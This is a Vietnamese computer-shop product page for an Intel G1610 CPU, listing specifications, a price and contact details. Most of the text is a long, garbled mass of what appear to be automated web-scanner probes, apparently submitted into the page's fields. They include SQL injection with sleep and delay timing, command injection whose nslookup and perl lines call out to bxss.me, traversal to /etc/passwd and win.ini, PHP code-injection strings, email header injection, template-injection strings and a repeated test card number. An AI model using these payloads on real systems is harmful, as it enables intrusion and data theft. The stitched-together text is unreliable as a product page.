Danh mục sản phẩm

CPU G1610( SK 1155)

Giá bán: 170,000 đ

Các Đặc Điểm Kỹ Thuật

-
Thiết yếu
Tình trạng               Launched
Ngày phát hành Q1'13
Số hiệu Bộ xử lý G1610
Bộ nhớ đệm thông minh Intel® 2 MB
DMI 5 GT/s
Bộ hướng dẫn 64-bit
Phần mở rộng bộ hướng dẫn SSE4.1/4.2
Có sẵn Tùy chọn nhúng
No
Thuật in thạch bản 22 nm
Khả năng mở rộng 1S Only
Thông số giải pháp Nhiệt 2011C
Giá đề xuất cho khách hàng TRAY: $42.00
BOX : $42.00
Không xung đột Yes
Bảng dữ liệu Link
-
Hiệu suất
Số lõi 2
Số luồng 2
Tần số cơ sở của bộ xử lý 2.6 GHz
TDP 55 W
Số lượng: SL:
   LIÊN HỆ ĐẶT HÀNG: 0903.863.684

Các Đặc Điểm Kỹ Thuật

-
Thiết yếu
Tình trạng               Launched
Ngày phát hành Q1'13
Số hiệu Bộ xử lý G1610
Bộ nhớ đệm thông minh Intel® 2 MB
DMI 5 GT/s
Bộ hướng dẫn 64-bit
Phần mở rộng bộ hướng dẫn SSE4.1/4.2
Có sẵn Tùy chọn nhúng
No
Thuật in thạch bản 22 nm
Khả năng mở rộng 1S Only
Thông số giải pháp Nhiệt 2011C
Giá đề xuất cho khách hàng TRAY: $42.00
BOX : $42.00
Không xung đột Yes
Bảng dữ liệu Link
-
Hiệu suất
Số lõi 2
Số luồng 2
Tần số cơ sở của bộ xử lý 2.6 GHz
TDP 55 W

TBH Computer
ĐC: 280/7 Nơ Trang Long F12 Q.Bình Thạnh
Phone-Viber-Zalo: 0903 863 684
Yahoo: Tbhcomputer01
Website: www.tbhcomputer.vn
Fanpage:https://www.facebook.com/tbhcomputer.vn
VCB: 0461000469211 Trương Hoàng Long

 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
1gDlz4AO
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 1mEo9G68O
4111111111111111
 ZSXWKrHh
response.write(9678970*9388991)
 ZSXWKrHh
5PYkeJqK
 ZSXWKrHh
i9lj7LZT
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
'+response.write(9678970*9388991)+'
 ZSXWKrHh
4111111111111111
 wrKdid4T
4111111111111111
 ZSXWKrHh
echo gytmzp$()\ bksole\nz^xyu||a #' &echo; gytmzp$()\ bksole\nz^xyu||a #|" &echo; gytmzp$()\ bksole\nz^xyu||a #
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
&echo; nqshfx$()\ tlulwt\nz^xyu||a #' &echo; nqshfx$()\ tlulwt\nz^xyu||a #|" &echo; nqshfx$()\ tlulwt\nz^xyu||a #
 ZSXWKrHh
../../../../../../../../../../../../../../etc/passwd
 ZSXWKrHh
-1 OR 2+60-60-1=0+0+0+1 --
 ZSXWKrHh
-1 OR 2+764-764-1=0+0+0+1
 ZSXWKrHh
"+response.write(9678970*9388991)+"
 ZSXWKrHh
|echo ldlibg$()\ xczqri\nz^xyu||a #' |echo ldlibg$()\ xczqri\nz^xyu||a #|" |echo ldlibg$()\ xczqri\nz^xyu||a #
 ZSXWKrHh
-1' OR 2+95-95-1=0+0+0+1 --
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
../../../../../../../../../../../../../../windows/win.ini
 ZSXWKrHh
-1' OR 2+953-953-1=0+0+0+1 or 'XnepWQnk'='
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
../4111111111111111
 ZSXWKrHh
(nslookup hitbiurfststyfcfee.bxss.me||perl -e "gethostbyname('hitbiurfststyfcfee.bxss.me')")
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
bcc:009247.29-5577.29.79b58.19088.2@bxss.me
 ZSXWKrHh
to@example.com>
bcc:009247.29-5578.29.79b58.19088.2@bxss.me
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
-1" OR 2+629-629-1=0+0+0+1 --
 ZSXWKrHh
$(nslookup hitwmchqvbujxc59f9.bxss.me||perl -e "gethostbyname('hitwmchqvbujxc59f9.bxss.me')")
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 response.write(9462309*9409856)
4111111111111111
 ZSXWKrHh
4111111111111111
 '+response.write(9462309*9409856)+'
4111111111111111
 ZSXWKrHh
if(now()=sysdate(),sleep(15),0)
 ZSXWKrHh
&(nslookup hitgkcmubfgyt04dff.bxss.me||perl -e "gethostbyname('hitgkcmubfgyt04dff.bxss.me')")&'\"`0&(nslookup hitgkcmubfgyt04dff.bxss.me||perl -e "gethostbyname('hitgkcmubfgyt04dff.bxss.me')")&`'
 ZSXWKrHh
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
 ZSXWKrHh
|(nslookup hithauyguewgn187a7.bxss.me||perl -e "gethostbyname('hithauyguewgn187a7.bxss.me')")
 ZSXWKrHh
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
 "+response.write(9462309*9409856)+"
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh bcc:009247.29-5581.29.79b58.19088.2@bxss.me
4111111111111111
 ZSXWKrHh
`(nslookup hittltrdhebao9c1b5.bxss.me||perl -e "gethostbyname('hittltrdhebao9c1b5.bxss.me')")`
 ZSXWKrHh
 ZSXWKrHh
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
 ../../../../../../../../../../../../../../etc/passwd
4111111111111111
 ZSXWKrHh
12345'"\'\");|]*{
<>
 ../../../../../../../../../../../../../../windows/win.ini
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
-1; waitfor delay '0:0:15' --
 to@example.com> bcc:009247.29-5582.29.79b58.19088.2@bxss.me
4111111111111111
 ZSXWKrHh
;(nslookup hitdeaoxaewxpf3f48.bxss.me||perl -e "gethostbyname('hitdeaoxaewxpf3f48.bxss.me')")|(nslookup hitdeaoxaewxpf3f48.bxss.me||perl -e "gethostbyname('hitdeaoxaewxpf3f48.bxss.me')")&(nslookup hitdeaoxaewxpf3f48.bxss.me||perl -e "gethostbyname('hitdeaoxaewxpf3f48.bxss.me')")
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ../ZSXWKrHh
4111111111111111
 ZSXWKrHh
-1); waitfor delay '0:0:15' --
 ZSXWKrHh
1 waitfor delay '0:0:15' --
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
0CX1i2VV'; waitfor delay '0:0:15' --
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
-5 OR 864=(SELECT 864 FROM PG_SLEEP(15))--
 ZSXWKrHh
${9999578+9999222}
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
-5) OR 665=(SELECT 665 FROM PG_SLEEP(15))--
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ${9999048+9999145}
4111111111111111
 ZSXWKrHh
-1)) OR 76=(SELECT 76 FROM PG_SLEEP(15))--
 12345'"\'\");|]*{ <>
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
CjZEFuxP' OR 809=(SELECT 809 FROM PG_SLEEP(15))--
 ZSXWKrHh
Pafcynzm') OR 893=(SELECT 893 FROM PG_SLEEP(15))--
 S0NuR3NDdWc=
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 ZSXWKrHh
)
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
1some_inexistent_file_with_long_name.jpg
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
Http://bxss.me/t/fit.txt
 ZSXWKrHh
!(()&&!|*|*|
 ZSXWKrHh
jJFZm8OU')) OR 525=(SELECT 525 FROM PG_SLEEP(15))--
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111&n932909=v912550
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
http://bxss.me/t/fit.txt?.jpg
 ZSXWKrHh
4111111111111111*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
 ZSXWKrHh
4111111111111111'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
bxss.me
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
^(#$!@#$)(()))******
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
1'"
 ZSXWKrHh
1
 ZSXWKrHh&n909845=v935813
4111111111111111
 echo wozucm$()\ zscewi\nz^xyu||a #' &echo; wozucm$()\ zscewi\nz^xyu||a #|" &echo; wozucm$()\ zscewi\nz^xyu||a #
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 &echo; ecjgss$()\ tbgnrd\nz^xyu||a #' &echo; ecjgss$()\ tbgnrd\nz^xyu||a #|" &echo; ecjgss$()\ tbgnrd\nz^xyu||a #
4111111111111111
 ZSXWKrHh
'"()
 |echo prsuzk$()\ olligi\nz^xyu||a #' |echo prsuzk$()\ olligi\nz^xyu||a #|" |echo prsuzk$()\ olligi\nz^xyu||a #
4111111111111111
 ZSXWKrHh
'.gethostbyname(lc('hittf'.'dwdsnwvx06620.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(65).chr(116).chr(74).'
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
@@QbY2b
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
".gethostbyname(lc("hitza"."mgkssqjs95423.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(69).chr(102).chr(90)."
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 '"()
4111111111111111
 ZSXWKrHh
4111111111111111
 )
4111111111111111
 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
 !(()&&!|*|*|
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ^(#$!@#$)(()))******
4111111111111111
 ZSXWKrHh
';print(md5(31337));$a='
 ZSXWKrHh
HttP://bxss.me/t/xss.html?
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
";print(md5(31337));$a="
 ZSXWKrHh
4111111111111111
 (nslookup hitylymbjautmd0306.bxss.me||perl -e "gethostbyname('hitylymbjautmd0306.bxss.me')")
4111111111111111
 ZSXWKrHh
4111111111111111
 '.gethostbyname(lc('hitme'.'auqzaskd51977.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(115).chr(79).'
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ".gethostbyname(lc("hitsn"."bsdlxlxj53cbf.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(69).chr(101).chr(90)."
4111111111111111
 ZSXWKrHh
bxss.me/t/xss.html?
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 1some_inexistent_file_with_long_name.jpg
4111111111111111
 $(nslookup hitpbnpxvubtn7b8d0.bxss.me||perl -e "gethostbyname('hitpbnpxvubtn7b8d0.bxss.me')")
4111111111111111
 ZSXWKrHh
4111111111111111
 &(nslookup hitmdcaaqteaze4b44.bxss.me||perl -e "gethostbyname('hitmdcaaqteaze4b44.bxss.me')")&'\"`0&(nslookup hitmdcaaqteaze4b44.bxss.me||perl -e "gethostbyname('hitmdcaaqteaze4b44.bxss.me')")&`'
4111111111111111
 |(nslookup hitultpladmzif2a57.bxss.me||perl -e "gethostbyname('hitultpladmzif2a57.bxss.me')")
4111111111111111
 HttP://bxss.me/t/xss.html?
4111111111111111
 bxss.me/t/xss.html?
4111111111111111
 `(nslookup hitpcznjqtyrkb5eec.bxss.me||perl -e "gethostbyname('hitpcznjqtyrkb5eec.bxss.me')")`
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
${@print(md5(31337))}
 Http://bxss.me/t/fit.txt
4111111111111111
 ZSXWKrHh
${@print(md5(31337))}\
 ZSXWKrHh
4111111111111111
 http://bxss.me/t/fit.txt?.jpg
4111111111111111
 ZSXWKrHh
4111111111111111
 bxss.me
4111111111111111
 ;(nslookup hitwkqwocdnqm49779.bxss.me||perl -e "gethostbyname('hitwkqwocdnqm49779.bxss.me')")|(nslookup hitwkqwocdnqm49779.bxss.me||perl -e "gethostbyname('hitwkqwocdnqm49779.bxss.me')")&(nslookup hit
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
"+"A".concat(70-3).concat(22*4).concat(103).concat(87).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitvc"+"pstbrudw6b0fe.bxss.me.")[3].to_s)+"
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
'+'A'.concat(70-3).concat(22*4).concat(112).concat(90).concat(115).concat(75)+(require'socket'
Socket.gethostbyname('hitii'+'njfkcfpra2e02.bxss.me.')[3].to_s)+'
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
data_comment
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
'.print(md5(31337)).'
 ZSXWKrHh
data_comment
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
data_comment/.
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 "+"A".concat(70-3).concat(22*4).concat(103).concat(72).concat(118).concat(90)+(require"socket" Socket.gethostbyname("hitzi"+"kpczzzdvb49d5.bxss.me.")[3].to_s)+"
4111111111111111
 '+'A'.concat(70-3).concat(22*4).concat(110).concat(83).concat(106).concat(81)+(require'socket' Socket.gethostbyname('hityg'+'gquusjwz0974d.bxss.me.')[3].to_s)+'
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 data_comment
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
/xfs.bxss.me
 data_comment
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ';print(md5(31337));$a='
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 /xfs.bxss.me
4111111111111111
 ZSXWKrHh
4111111111111111
 data_comment/.
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ";print(md5(31337));$a="
4111111111111111
 ZSXWKrHh
'"
 ${@print(md5(31337))}
4111111111111111
 ZSXWKrHh
<!--
 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 4d5eAKBd
4111111111111111
 ZSXWKrHh
4111111111111111'"()&%[removed]pQ6P(9753)[removed]
 -1 OR 2+666-666-1=0+0+0+1 --
4111111111111111
 ${@print(md5(31337))}\
4111111111111111
 ZSXWKrHh
4111111111111111
 -1 OR 2+914-914-1=0+0+0+1
4111111111111111
 '.print(md5(31337)).'
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
'"()&%[removed]pQ6P(9451)[removed]
 -1' OR 2+373-373-1=0+0+0+1 --
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
41111111111111119899011
 -1' OR 2+773-773-1=0+0+0+1 or 'p0GeaJHI'='
4111111111111111
 -1" OR 2+839-839-1=0+0+0+1 --
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 '"
4111111111111111
 ZSXWKrHh
4111111111111111
 if(now()=sysdate(),sleep(15),0)
4111111111111111
 <!--
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh'"()&%[removed]pQ6P(9145)[removed]
4111111111111111
 ZSXWKrHh
4111111111111111
 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
4111111111111111
 '"()&%[removed]pQ6P(9012)[removed]
4111111111111111
 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
4111111111111111
 ZSXWKrHh9412402
4111111111111111
 1 waitfor delay '0:0:15' --
4111111111111111
 ZSXWKrHh
4111111111111111
 pKlDozQL'; waitfor delay '0:0:15' --
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 tSo6LPaM' OR 739=(SELECT 739 FROM PG_SLEEP(15))--
4111111111111111
 hioZ45In') OR 902=(SELECT 902 FROM PG_SLEEP(15))--
4111111111111111
 ZSXWKrHh
4111111111111111
 3cGZuT0G')) OR 826=(SELECT 826 FROM PG_SLEEP(15))--
4111111111111111
 ZSXWKrHh'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
4111111111111111
 1'"
4111111111111111
 1
4111111111111111
 @@nHVIJ
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 pHqghUme
4111111111111111
 pHqghUme
4111111111111111
 ZSXWKrHh
4111111111111111'"()&%[removed]Cuuy(9735)[removed]
 ZSXWKrHh
'"()&%[removed]Cuuy(9246)[removed]
 ZSXWKrHh'"()&%[removed]6IVG(9332)[removed]
4111111111111111
 ZSXWKrHh
41111111111111119853105
 ZSXWKrHh
acu1291<s1﹥s2ʺs3ʹuca1291
 '"()&%[removed]6IVG(9249)[removed]
4111111111111111
 ZSXWKrHh
acux5956
 ZSXWKrHh9762311
4111111111111111
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 acu9142<s1﹥s2ʺs3ʹuca9142
4111111111111111
 ZSXWKrHh
 acux10457
4111111111111111
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 
4111111111111111
 ZSXWKrHh
acx[[${98991*97996}]]xca
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acx__${98991*97996}__::.x
 acx{{98991*97996}}xca
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh
4111111111111111[removed]Cuuy(9150)[removed]
 acx__${98991*97996}__::.x
4111111111111111
 ZSXWKrHh
41111111111111116NVOH[!+!]
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh[removed]6IVG(9768)[removed]
4111111111111111
 ZSXWKrHhXNSBB[!+!]
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111
 ZSXWKrHh
4111111111111111'"()&%[removed]dh3O(9094)[removed]
 ZSXWKrHh
4111111111111111'"()&%[removed]JGSM(9614)[removed]
 ZSXWKrHh
'"()&%[removed]dh3O(9612)[removed]
 ZSXWKrHh
'"()&%[removed]JGSM(9202)[removed]
 ZSXWKrHh
4111111111111111'"()&%[removed]9TWB(9299)[removed]
 ZSXWKrHh
41111111111111119096653
 ZSXWKrHh
41111111111111119378083
 ZSXWKrHh
'"()&%[removed]9TWB(9361)[removed]
 ZSXWKrHh'"()&%[removed]nYkB(9641)[removed]
4111111111111111
 '"()&%[removed]nYkB(9547)[removed]
4111111111111111
 ZSXWKrHh
41111111111111119417765
 ZSXWKrHh9289830
4111111111111111
 ZSXWKrHh
acu9025<s1﹥s2ʺs3ʹuca9025
 ZSXWKrHh
acu7194<s1﹥s2ʺs3ʹuca7194
 ZSXWKrHh'"()&%[removed]U8JU(9346)[removed]
4111111111111111
 ZSXWKrHh
acux3656
 ZSXWKrHh
acux5983
 ZSXWKrHh
acu1653<s1﹥s2ʺs3ʹuca1653
 '"()&%[removed]U8JU(9903)[removed]
4111111111111111
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 ZSXWKrHh
acux2845
 acu5855<s1﹥s2ʺs3ʹuca5855
4111111111111111
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 ZSXWKrHh9161878
4111111111111111
 ZSXWKrHh
 acux2642
4111111111111111
 ZSXWKrHh'"()&%[removed]tojP(9526)[removed]
4111111111111111
 ZSXWKrHh'"()&%[removed]Nkw2(9772)[removed]
4111111111111111
 ZSXWKrHh
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 <%={{={@{#{${acx}}%>
4111111111111111
 '"()&%[removed]tojP(9689)[removed]
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 '"()&%[removed]Nkw2(9280)[removed]
4111111111111111
 
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 acu6583<s1﹥s2ʺs3ʹuca6583
4111111111111111
 ZSXWKrHh
acx[[${98991*97996}]]xca
 ZSXWKrHh
acx[[${98991*97996}]]xca
 ZSXWKrHh9786942
4111111111111111
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
 ZSXWKrHh
acx__${98991*97996}__::.x
 ZSXWKrHh9764215
4111111111111111
 ZSXWKrHh
acx__${98991*97996}__::.x
 acux10991
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 ZSXWKrHh
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
 acu3075<s1﹥s2ʺs3ʹuca3075
4111111111111111
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 acu7678<s1﹥s2ʺs3ʹuca7678
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh
4111111111111111[removed]dh3O(9965)[removed]
 acux10122
4111111111111111
 acux2797
4111111111111111
 ZSXWKrHh
acx{{98991*97996}}xca
 
4111111111111111
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
4111111111111111HFUXN[!+!]
 acx__${98991*97996}__::.x
4111111111111111
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acx[[${98991*97996}]]xca
 
4111111111111111
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
4111111111111111[removed]JGSM(9135)[removed]
 ZSXWKrHh
acx__${98991*97996}__::.x
 
4111111111111111
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
 ZSXWKrHh
4111111111111111HUSX6[!+!]
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 ZSXWKrHh
4111111111111111[removed]9TWB(9740)[removed]
 ZSXWKrHh'"()&%[removed]gXm5(9989)[removed]
4111111111111111
 ZSXWKrHh'"()&%[removed]6UZe(9325)[removed]
4111111111111111
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh
4111111111111111TKMR3[!+!]
 ZSXWKrHh[removed]nYkB(9176)[removed]
4111111111111111
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 '"()&%[removed]6UZe(9441)[removed]
4111111111111111
 acx[[${98991*97996}]]xca
4111111111111111
 '"()&%[removed]gXm5(9523)[removed]
4111111111111111
 acx{{98991*97996}}xca
4111111111111111
 acx__${98991*97996}__::.x
4111111111111111
 ZSXWKrHh'"()&%[removed]mpGq(9291)[removed]
4111111111111111
 acx[[${98991*97996}]]xca
4111111111111111
 ZSXWKrHh0EX2W[!+!]
4111111111111111
 acx__${98991*97996}__::.x
4111111111111111
 ZSXWKrHh9770743
4111111111111111
 ZSXWKrHh9093324
4111111111111111
 ZSXWKrHh
4111111111111111'"()&%[removed]kI4H(9623)[removed]
 acx__${98991*97996}__::.x
4111111111111111
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 '"()&%[removed]mpGq(9464)[removed]
4111111111111111
 acu2055<s1﹥s2ʺs3ʹuca2055
4111111111111111
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh
'"()&%[removed]kI4H(9822)[removed]
 "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
4111111111111111
 ZSXWKrHh9804701
4111111111111111
 acu3205<s1﹥s2ʺs3ʹuca3205
4111111111111111
 ZSXWKrHh[removed]Nkw2(9973)[removed]
4111111111111111
 acux6095
4111111111111111
 ZSXWKrHh
41111111111111119285401
 ZSXWKrHh
4111111111111111'"()&%[removed]IXUa(9272)[removed]
 ZSXWKrHh[removed]tojP(9657)[removed]
4111111111111111
 ZSXWKrHh[removed]U8JU(9964)[removed]
4111111111111111
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
'"()&%[removed]IXUa(9818)[removed]
 ZSXWKrHh0LZD3[!+!]
4111111111111111
 acux5209
4111111111111111
 ZSXWKrHhDMS8P[!+!]
4111111111111111
 ZSXWKrHh
41111111111111119299719
 ZSXWKrHh
4111111111111111'"()&%[removed]fztI(9159)[removed]
 
4111111111111111
 ZSXWKrHh
acu9753<s1﹥s2ʺs3ʹuca9753
 ZSXWKrHh
4111111111111111'"()&%[removed]MFEs(9902)[removed]
 acu10392<s1﹥s2ʺs3ʹuca10392
4111111111111111
 <%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acux10841
 ZSXWKrHh
acu4867<s1﹥s2ʺs3ʹuca4867
 acux3456
4111111111111111
 ZSXWKrHh
'"()&%[removed]MFEs(9050)[removed]
 ZSXWKrHhNB0IM[!+!]
4111111111111111
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 ZSXWKrHh
'"()&%[removed]fztI(9687)[removed]
 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
4111111111111111
 ZSXWKrHh
acux5776
 
4111111111111111
 ZSXWKrHh
41111111111111119309825
 ZSXWKrHh
<%={{={@{#{${acx}}%>
 acx{{98991*97996}}xca
4111111111111111
 ZSXWKrHh
41111111111111119861319
 <%={{={@{#{${acx}}%>
4111111111111111
 acx[[${98991*97996}]]xca
4111111111111111
